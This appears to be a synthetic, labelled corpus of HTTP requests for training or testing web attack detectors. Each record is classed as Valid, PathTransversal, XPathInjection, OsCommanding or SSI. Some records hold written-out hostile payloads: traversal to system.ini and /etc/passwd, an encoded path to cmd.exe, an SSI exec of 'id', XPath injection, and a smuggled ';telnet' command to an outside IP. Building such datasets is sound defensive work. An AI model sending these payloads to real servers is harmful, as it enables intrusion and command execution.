UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: 8.7 www.cdrz.jpg:27, a4otre/1.5 20.34.159.146
Transfer-Encoding: o6oriq
Upgrade: 6tin9m/2.5
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15646
Start - Id: 45939
class: PathTransversal
GET /ejxqP1SLzE/2eahlwii/ptsasxi1ci0yoohsosu/lkhboneTnn.gif?m.SmZw=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&eohrt7=5694656 HTTP/1.1
Host: 157.136.24.185
Connection: keep-alive
Accept: text/*;q=0.9, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: e-hed, 45ro2I-ql;q=0.2, le-iO;q=0.3, eegedwjw-ran;q=0.1
Cache-Control: Natn='sowrlo'
Client-ip: 253.221.96.27
Cookie: roIei5aDelh=kBc%;gobatcaotsa=ziAe;tssLthmr=0855
Cookie2: $Version="3"
Date: Sun, 23 May 04 02:54:28 GMT
ETag: "I-1Vu8lJh1NeMa7Y"
Expect: 100-continue
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Sun, 22 Apr 07 13:18:49 GMT
If-Unmodified-Since: Sat, 05 Jan 08 13:41:05 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Dec 08 01:00:32 UTC
Max-Forwards: 7656
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /t8v0e/ei3qCos/5pho99/yeoi5e/teew.jpg
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/5.7 (compatible; HroH4nso; Windows NT; em0lvrg; rtiieie; i9e4ery)
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/1.3 174.175.247.217, 7.9 www.vVPeiaE.tiff, ezqew/1.1 www.f8fbaind.shtml:33
Transfer-Encoding: telre
Upgrade: Hne/9.3, keht/9.7, eldt/7.3, tlenn/6.0
Warning: 301 www.foehiLHu.gif "dqnsc" 
X-Serial-Number: 15666151508879935432
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45939
Start - Id: 28575
class: Valid
GET /q3F2V-t-f8HTlAs/iseinroeahes651retii/pyMOR3a/h753/0yDJ3cJ/hnmFlzJVaH3T/fKVrXglpB5v7o.exe?achbeTrl=2029&zB1eboot.ini56te0dexec=eca&dnseh=tzrtnelveUzS&ussarwoaA=52&L_fromta=t.l2TpYy&2NCTdkGgroup byuIGe=njt+onnshif+go5syBu&os7udhT=Nyee&moeic=%24Ednph-&esard=203963571&piecrdsnMiwO=4oetlaogbui0&glNeengtizo=iO%3Cle1clar2c&Y5X.Hw9unodeRdt=t7fEXVuP2q&e8miimot=1 HTTP/1.0
Host: www.Wnbqaan.com
Connection: meOi
Accept: image/png, application/*;q=0.6
Accept-Charset: euc-tw;q=0.6, ks_c_5601-1987;q=0.7, windows-874;q=0.0, x-mac-japanese;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 32.126.230.226
Cookie: lss8fxs=21068503;mgwcewsbnl8=1nd;aetekpmp4utdxoh=cIlT3al4lats;9wtci4kk=eX9wmopEz;tEB7iioroksIma0=i8Z
Cookie2: $Version="5"
Date: Sun, 12 Mar 06 16:44:44 CET
ETag: W/"IlSB0SVupMAYKnpEoST"
Expect: s1yno7eS=hb0h
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Fri, 22 May 09 11:34:49 CET
If-Unmodified-Since: Wed, 15 Apr 09 14:41:03 UTC
If-Match: "p0vikljvZB8SIGDHJy"
If-None-Match: "txFbicv4IM0Z1B19ce"
If-Range: Thu, 01 Jan 09 20:06:55 GMT
Max-Forwards: 9
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dothii rw4uoS=mtsNtaid
Authorization: Digest nonce
Range: 8-800450
Referer: /nsiwlem0/frvopse/hp5h/oronh/0u5sb.zip
TE: chunked;q=0.6,gzip;q=0.2,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 1.8; i4-ds; rv:2.1.2) Gecko/36533768
UA-CPU: StrongARM
UA-Disp: 9594,2668,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5673x9154
Via: 9.8 161.174.182.154:92125, FTP/6.8 www.0Tdfe.html
Transfer-Encoding: deflate
Upgrade: thto1/0.0, nre/1.4
Warning: 425 202.135.1.163 "oeae" "Wed, 30 May 07 10:46:17 UTC"
X-Forwarded-For: 247.244.131.237
X-Serial-Number: 37650652134780806
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28575
Start - Id: 14426
class: Valid
GET /ntnafornwxsdsolcrd/EsrcehkbnomoS/6_I/5LPuV/Wr2yniow/likeDgFSBx/texSR/nskhAlzWnsseua/oirreel/rs9/5_67atAaRZBx00/avbhg5tnsieEwe.pl?6aha1ddestss=chlcl3metaselect+dhs&N2E-6LzCL=5995&a6euzSindae=idtaa5tieuawog%5Dr7hz&hn=55142&aovcadoauinam=passthru%7C&Dvypgaeen=oWX&FrAiavn3ca8=813757&rnA8=02097118&eDgIa=rlocationp&DRo97IZIG6=rals7%3A6ystylenehbec4systemm&peasrhrmotwtl=s%7Er&U7ghdm3aazehTUs=o%3Eny HTTP/1.1
Host: www.znli.net:7
Connection: keep-alive
Accept: video/quicktime;q=0.7
Accept-Charset: x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: nad-IuoTete
Cache-Control: no-cache
Client-ip: 239.225.229.87
Cookie: w5orst=oowuenrwfir
Cookie2: $Version="40"
Date: Sun, 31 Aug 08 12:15:33 UTC
ETag: W/"Q1OdF28X4Lc@jc_xxib"
Expect: vosa
From: eeruerum@ttseykhtas.gov
If-Modified-Since: Fri, 23 Nov 07 15:01:08 UTC
If-Unmodified-Since: Mon, 08 Dec 08 18:04:02 GMT
If-Match: *
If-None-Match: "IMSuC0kr7GMPr02b2pqZ"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Letted rWnhgaAo=tiitsc
Authorization: NTLM NmVyZWZrcmJsb3RyaWVQaGkwWWlnaGVlRW1paG9zNGJveDNzY2ZNVGFB
Range: 95-
Referer: /nuabomo/a6nCitse/r4oO0/2senne.swf
TE: deflate,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.1 (X11; U; Solaris 1.9; hn-dt; rv:0.2.4) Gecko/87161380
UA-CPU: MIPS
UA-Disp: 769,941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: 0.5 59.172.68.184:6354, weqn/2.7 101.132.96.102
Transfer-Encoding: eetrms
Upgrade: rean/3.6, zmcrDo/5.0, aoielb/7.5, Hearne/3.1
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14426
Start - Id: 48375
class: XPathInjection
GET /4gnYWfAbt2Kd.html? HTTP/1.0
Host: www.eslI.fr
Connection: e3eah
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew, windows-1255;q=0.6
Accept-Encoding: 609     or   1<     9/meS/iae/child::text()[position()=529]     or  19154='] | /* | /foo[bar='
Accept-Language: *
Cache-Control: no-cache
Client-ip: 34.130.231.33
Cookie2: $Version="9"
Date: Fri, 12 Mar 10 22:44:18 CET
ETag: W/"R3jwvlpSyvKD@X3"
Expect: dqa6O
If-Modified-Since: Mon, 16 Feb 04 06:12:12 CET
If-Range: Wed, 26 May 04 06:37:44 GMT
Max-Forwards: 78
Pragma: Shnuzai='gonhTns'
Referer: /Fhsxrt.msf
TE: trailers
User-Agent: Mozilla/9.2 (compatible; e8WJwu; Windows NT; csqO1)
UA-Disp: 373,940,32
UA-Pixels: 9943x7757
Via: 9.8 55.70.129.253, 0.1 25.217.218.162:5, 3.9 218.254.244.64
Transfer-Encoding: compress
Upgrade: sth/0.2
Warning: 207 51.200.199.142 "cdmsHtrstOtieyeEsd" 

null

End - Id: 48375
Start - Id: 26071
class: Valid
GET /bDgIu4VvDh/ywaoInanltre/fba1mrrtedcea5n/tv2/qX3.cfm?ineaeawHhei1rrn=oOarertcebsrmrhSvo&sqhlHjaoeTPkndw=T%25u%24ae&sifAaerr8=o3usWL054NSz HTTP/1.1
Host: www.mdns.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-5, ks_c_5601-1987, utf-8;q=0.2, iso-8859-15;q=0.9, euc-jp
Accept-Encoding: 
Accept-Language: aseC-Hinang;q=0.6, n-wohT
Cache-Control: min-fresh=95
Client-ip: 104.91.44.192
Cookie: S8-gy6uRstyle=hio;bJSrgroup bysgWDq=92;lsiszoesasict=ee|lhu k-2sce%sAE3y8;iphtysec1roLr=v_E;nuEp8AiuiFa8ds=orbvu:xrfk&n
Cookie2: $Version="6"
Date: Wed, 19 May 04 10:00:19 GMT
ETag: W/"lc.HWafmi@6sQmMRq"
Expect: Emueor
From: reL8e@gatir.gov
If-Modified-Since: Mon, 06 Feb 06 20:28:23 UTC
If-Unmodified-Since: Fri, 21 Jul 06 01:12:27 GMT
If-Match: "EjvNYoHZrm226C9uqvT"
If-None-Match: "vAE.I@6Ph2Nj4Wk"
If-Range: Sat, 12 Jul 08 14:48:45 GMT
Max-Forwards: 089
MIME-Version: 9.3
Pragma: nteie=ht3
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: 8xn3a udlexv=E4adtnts
Range: -120758,375-
Referer: http://www.2fth.com/orkLg.txt
TE: gzip
Trailer: Referer
User-Agent: le3Da/4.0
UA-CPU: MIPS
UA-Disp: 5226,2357,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 096x0326
Via: FTP/5.1 www.tSpsdco.js:6
Transfer-Encoding: gzip
Upgrade: adreto/0.5, erstt/5.5, 1elbre/0.6
Warning: 849 www.lsim.tiff:35662 "ifqLts" "Mon, 09 Jan 06 16:39:11 CET"
X-Forwarded-For: 72.230.129.152
X-Serial-Number: 39635409831917
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26071
Start - Id: 1005
class: Valid
GET /ctjPI8H-cDbGd@eBc@g/tnZ7NJLjMWs0wygNfsD7/N8trsophdtoeto/yhEIv0taesqserenpEe/ou1yTQlsw/etjezne/zEZp91X8t.5M4A/wFfRcOh-GwuP2zg/RUhomeZf/Yo/he9ohmiswisstsvuevn.css?msibextotonYsno=iEah87ntr&htacces7Wlformc7=8135875&OtMS@6@UWj=6676895&eu=aomRbu%40&utriyJtod=136729871&kG.SyOoj=documenti&eghelt=o1c&oIT=lft&LErvGxaS-DSH=8501 HTTP/1.1
Host: 87.82.119.60
Connection: 0cisaOal
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: AwnR-x, hnf-r;q=0.0, vd1llTsh-q;q=0.4, teucvc-ii
Cache-Control: no-store
Client-ip: 174.40.171.214
Cookie: tpsaampav0homae=nsPs-V9@J6l
Cookie2: $Version="68"
Date: Thu, 27 Mar 08 12:32:46 CET
ETag: W/"4k_LvEQG.-hKsyTNih"
Expect: 100-continue
From: iaaeh@rEee.it
If-Modified-Since: Mon, 21 Sep 09 06:51:51 UTC
If-Unmodified-Since: Wed, 05 May 10 19:59:00 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Aug 07 07:44:07 GMT
Max-Forwards: 7035
MIME-Version: 5.1
Pragma: H=e
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 726319-,933-
Referer: /pi2SO10/9dtRewwa/6lo31/ovym.php3
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: PtfsirgeE/2.2.9.8
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 3.7 63.100.142.155
Transfer-Encoding: gzip
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 561 123.33.248.80 "ohsncetm" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1005
Start - Id: 36387
class: OsCommanding
GET /oVz8Qam@0zijbqK6C-.O.php?XUNi=%3C%21--%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cpu%5Crwerte%5C6N.exe+++++d%3A%5CaQoy%5Cwww.eselnt.org%5Ctgaausbpp%5Cdatabase.mdb++%2Fx+exporttofoxpro%22--%3E HTTP/1.0
Host: www.nuoitt.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-2;q=0.6, x-mac-hebrew;q=0.1
Accept-Encoding: *
Accept-Language: reha-hcphhtt, nvycoC7a-ceStl;q=0.5, hoOes-ef
Client-ip: 46.249.247.179
Cookie: cnhciae=rbb3YwLR;sh6ylte7stebtlz=svopeni;fwDuon=oreo
Cookie2: $Version="90"
Date: Mon, 30 May 05 11:58:17 UTC
ETag: "Y_FanZdQrXrmiFy"
If-Modified-Since: Wed, 23 Jun 04 20:22:03 CET
If-Match: "KQIx-DOjTgMNU5i"
If-None-Match: *
Max-Forwards: 7
Pragma: no-cache
Authorization: Basic aWExbm5OZjpsZWxm
Referer: http://www.v3cu4ims.fr/goevph8w/iecwiToe/UT1erz.pdf
TE: trailers
User-Agent: Mozilla/1.2 (compatible; MSIE 2.0; Unix; aotvhled; uhe48K4i; 93sxv8sees)
UA-Color: color8
UA-Pixels: 4806x485
Via: FTP/7.8 www.pnfraEI.shtml, Selxa/8.5 www.si5hcijr.html, HTTP/7.2 www.hmi2Vd.js
Transfer-Encoding: dira
Warning: 052 11.146.188.46:6 "inedno" 
----: ------------------------------

null

End - Id: 36387
Start - Id: 18622
class: Valid
GET /rzS7JiyLkstyle/nyt3-3QqDj8z53al/aeeioahocEtrs/oR79eTDOXUFRD2HE8J/8ACIwJW/e@C/t7motr.png? HTTP/1.0
Host: 100.131.110.248
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-korean, x-mac-japanese;q=0.8, x-mac-chinesesimp;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 224.49.207.166
Cookie: ioi8eiEBRa=404
Cookie2: $Version="38"
Date: Sat, 08 Sep 07 22:54:44 GMT
ETag: "NnKgyFyK92tfQrPcAGw"
Expect: 100-continue
From: WuraiaaN@7ttgiDeiio.org
If-Modified-Since: Sat, 14 Feb 09 12:50:45 GMT
If-Unmodified-Since: Wed, 14 Sep 05 03:30:33 GMT
If-Match: "i1HZmniHlBAzc4mp9R"
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: Mon, 15 Feb 10 13:42:01 GMT
Max-Forwards: 4770
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZW90YWlpOmhmZWhlRQ==
Authorization: NTLM dG5ycnJoQXR3aDdkZXN0ZWNiOHRlYmU1Z3NhYWhkOGZzY2Y=
Range: -0
Referer: /Tocas.htm
TE: gzip,deflate;q=0.5,chunked;q=0.3
Trailer: Pragma
User-Agent: nshld3 (dfk_9E; eEKOwGgN; e4AgnBEgQP; t5ElpLrLA)
UA-CPU: 68000
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7882x967
Via: reh/8.8 0.21.111.57:58983, HTTP/7.9 73.195.133.226, FTP/0.1 5.94.74.243
Transfer-Encoding: compress
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 858 www.lwelElt3.png "1bxSreEt8b" "Fri, 04 Jun 04 02:26:38 UTC"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18622
Start - Id: 44420
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 216.253.232.11:80
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: me5jjet-6Sxqh, SthznE-iStn;q=0.6, arcit0Di-znnb;q=0.6, oalo-rnb, l-i6yngu;q=0.3
Cache-Control: max-stale
Client-ip: 211.226.85.152
Cookie: hRsuh7=odRFiralrnd\ih
Cookie2: $Version="352"
Date: Tue, 16 Dec 08 08:23:01 CET
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: qeSl8a=erci;preie
From: i1nh90u@tvpyl.biz
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Tue, 10 Oct 06 03:50:38 GMT
If-Match: *
If-None-Match: "Mn5Mz2@cIHYZzIO8iZ0k"
If-Range: *
Max-Forwards: 1525
MIME-Version: 6.2
Pragma: a2rsn=mseL4a
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: NTLM QWRzbnRnOGRlNHRucm1oY2FhaGl2bG9FZWVJU2FkbnJ6aXM=
Range: 6-02287,72753-
Referer: /4arth.txt
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/0.8 (Windows; U; Win 9x 2.2; ta-ia; rv:0.4.3) Gecko/39952602
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: deflate
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44420
Start - Id: 23592
class: Valid
GET /aWnNSahkV0PP3QK.fTE/mfDo8t7/toU5ze/54ECmYGwN/Ess1eo/ewuhcu.css? HTTP/1.1
Host: 141.128.52.73:80
Connection: hpisetd9
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.0, iso-2022-kr, iso-8859-7, euc-jp;q=0.8, x-mac-turkish;q=0.5
Accept-Encoding: deflate, gzip;q=0.7, gzip, deflate;q=0.0, deflate
Accept-Language: i-lt, vo-r;q=0.4, f-ricnsiae
Cache-Control: only-if-cached
Client-ip: 240.220.99.142
Cookie: e4r4eetntanr=3isoauc36l
Cookie2: $Version="6"
Date: Mon, 27 Dec 04 21:41:54 CET
ETag: "deTB1BesKehTVhheWwR"
Expect: WFtlEa=s62Apn;bEaareaI=h3edeTeq
From: Aial5osa@Mysrie.uk
If-Modified-Since: Tue, 01 Jul 08 22:11:49 UTC
If-Unmodified-Since: Sun, 09 May 04 14:46:50 CET
If-Match: *
If-None-Match: *
If-Range: "i0TEPVzO8MbYm8oPRc"
Max-Forwards: 8
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: rXite lhh9o=0huotic
Authorization: leht aepcmv2=dh7t8s
Range: 62145-4,-94,41-
Referer: http://www.edvaofue.gov/cese/pm2ejeh/kd9po/j5toOc/ireadc.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.2 (Windows; U; WinNT 7.3; En-op; rv:7.0.5) Gecko/58858865
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 251x222
Via: FTP/6.7 61.234.110.186:402, 8.6 www.mJua.css, FTP/2.2 104.145.213.99
Transfer-Encoding: identity
Upgrade: oza/2.5
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 1009110184973666911
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23592
Start - Id: 36698
class: OsCommanding
PUT /fe/ur/dC8WwefCE/eT8IX.shtml? HTTP/1.1
Content-Length: 112
Content-Language: td62o1O,wd8
Content-Encoding: gzip
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: bmhzc3RnZHRob2gzdGh0Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 24:38:47 CET
Last-Modified: Thu, 06 Apr 06 24:01:12 GMT
Host: 50.141.56.196:4
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 83.189.215.58
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="6"
Date: Thu, 14 Jun 07 14:40:09 CET
Expect: 100-continue
From: debomi@hLAy.be
If-Modified-Since: Wed, 12 Jan 05 03:27:24 GMT
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: "Mw2e1oAmc2C56Fyn"
Max-Forwards: 649
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic RWNlanNsNG46dGM3MHhv
Authorization: Digest username="lruyb"
Range: 426198-
Referer: /eStt8a/annu3/imerli/cwfer/2egijyi.cgi
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 8.6; aa-ei; rv:3.8.5) Gecko/78336433
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: identity
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
----: -------------------------

tsbvike6st="    ;telnet 83.110.229.136    80  ;&eye0ivev7a=d%xmlSrt e%u4h&d3asq1nlwtn6aa=h0imHlhiaonYd

End - Id: 36698
Start - Id: 11173
class: Valid
GET /jG6o5N2stsiI/qVetcP4EX/vOQGG@2X2Fk/wic/ril3/%uHRE8VzH8lcmdV/sh.GRlZ@C/Wkbit.mspx?vnoz=wioLh34snNeAetx&dte=012&oaas3weyemsoEel=R&moalnns=ieauo4t&soa=i%40VZ5zByWTuZ&GynX5nKIahavingyt=4610952&Ruubthihdb9=6354641117&asuteeamau9tnn=t%2Fis%2B HTTP/1.0
Host: www.nhrnh.gov
Connection: close
Accept: video/*;q=0.0, image/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress, deflate;q=0.7, identity
Accept-Language: cIclTg-en1eeh;q=0.5, aenaxy6-sadIsa, iI1-tfdole;q=0.2
Cache-Control: only-if-cached
Client-ip: 40.40.233.206
Cookie: ns3er2e=are5phd7efE7Eh2trr;PvQHhN=i7nJR
Cookie2: $Version="956"
Date: Mon, 01 Nov 04 24:37:20 UTC
ETag: "TPC6tkqIvIsDHFr.az"
Expect: 100-continue
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Tue, 05 Feb 08 10:37:10 UTC
If-Unmodified-Since: Sun, 22 Apr 07 08:40:47 GMT
If-Match: "Kuchzpuj.czqbdQ"
If-None-Match: *
If-Range: Mon, 16 May 05 10:25:12 CET
Max-Forwards: 605
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: nucsre csotd=enlnnuol
Authorization: Basic bU1Ic2lzb2g6dXR1MmVl
Range: 01809-,9808-,-723
Referer: http://www.a64euiar.biz/ym4s0.dll
TE: chunked;q=0.1
Trailer: Warning
User-Agent: nfRcZ_J http://www.SyE6es.gov
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: se9rbj/8.2 www.0aCT4ai.htm, FTP/2.2 84.248.244.44
Transfer-Encoding: compress
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11173
Start - Id: 19013
class: Valid
GET /KS/s1PJEewmYM/gdwi/rne/ocPjtOmX9X2FTlB/hoeod3/i-5TE9X46F/iQ9KI41N4v3Xy8/ex@Qo/M7bs@I__scqHLU/3bVfUx58p7O/1canerloAtRden9dhrr.mdb? HTTP/1.0
Host: www.hst9.fr
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, iso-8859-8-i
Accept-Encoding: deflate;q=0.3, deflate, identity, gzip;q=0.1, identity;q=0.7
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 50.43.73.250
Cookie: WhXU.W@S=kSeix bjuonsb
Cookie2: $Version="62"
Date: Wed, 28 Jan 09 15:07:42 CET
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: Priuift@eiTp29Uz.ch
If-Modified-Since: Thu, 19 Jan 06 22:07:01 CET
If-Unmodified-Since: Fri, 01 Jun 07 09:23:32 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Aug 08 07:57:47 UTC
Max-Forwards: 17
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5-sess
Range: 002-0467,62-
Referer: http://www.Be28eenq.uk/nntuoH/63HSNri/Khirsa.jpg
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 0.7; ae-tn; rv:6.0.4) Gecko/84926859
UA-CPU: 68000
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: nebpM/3.4 77.113.111.168:89
Transfer-Encoding: gzip
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19013
Start - Id: 40212
class: SSI
POST /QWBdivB/tH0r@5JRXp6HG2/5httedpnwscRnshsvd/j-smetae/WGEexecS0Ms5Criy/kSwbBW4uf0DZtM_eVy/iepiuOlPU_I4htacces1G/mg9mtaf/wozWj-5JlJPRsWS4/sif-HuPuTNpj.html? HTTP/1.1
Content-Length: 60
Content-Language: nsmaol,D,osw7
Content-Encoding: deflate
Content-Location: /oIfhseie/i6th.swf
Content-MD5: bGVvaXV1QWFiMHR6b2hpaA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 30 Apr 04 10:14:25 CET
Host: 20.206.230.97
Connection: close
Accept: application/postscript, application/*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, gzip
Accept-Language: *
Cache-Control: max-stale
If-Range: *
MIME-Version: 8.1
Referer: http://www.ftirel.org/bteBhd.php4
User-Agent: <! #<!--    #exec    cmd="id"-->
UA-Disp: 1168,280,8
Upgrade: hmewb8/8.6
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4D9h5=244&1Simsneaes=nddriqi5fhsao&.Cv3IwrVM303=rl9rpaedcaat

End - Id: 40212
Start - Id: 46458
class: PathTransversal
PUT /e_AIt5jE_7ehGvhNL@rA/afttsaehdAe1eoft/fh/je1o17ttf/tWti..BIPRItwBmJxb/HcOacceptsr0H/h5aisnr.jpeg? HTTP/1.0
Content-Length: 282
Content-Language: Iae5v,Ebev,Lte
Content-Encoding: compress
Content-MD5: cGxsdENuNGdkZXBpY2Fpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Aug 04 12:21:30 GMT
Host: www.i9i9Pig.be:80
Connection: close
Accept: audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Client-ip: 79.17.144.86
Cookie: hw=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;i9RN=wphpiwnrxml9E;ye9omwuhhge3pt4=xrnN8ndevaletchcE l;hdo8b1as=n u
Date: Sat, 04 Feb 06 21:45:36 UTC
ETag: W/"z9f26ThXVv6KY.CdH"
If-Unmodified-Since: Wed, 11 May 05 18:14:36 GMT
If-Match: "Q4ba-BZu6GzDesD"
If-Range: Thu, 09 Nov 06 06:27:33 UTC
Max-Forwards: 2611
Pragma: no-cache
Referer: /ie8ttel.exe
User-Agent: Mozilla/2.4 (Windows; U; Win98 7.5; nr-0I; rv:3.2.1) Gecko/40401681

deiuztml6raqo=6813&aagoii5eue=ot&oDJdltt29nmmee9=4&apys=3oe&tsuia4ntn=hjMfU&_dLENbwu=earthtpass/c]alsO-&MlMrBP6TiJCB=  t5&Z0dtIpassthru875=nzf3bgTrMEUp&7e=hw&stt&r3Csaefh1rltc=iincludeuuy-<M&MKo-9rcatb1=30904895&fJlsYRformlink_d@d@=281876014&gheiei=6586168&U99mJ4KG=77689445

End - Id: 46458
Start - Id: 45339
class: PathTransversal
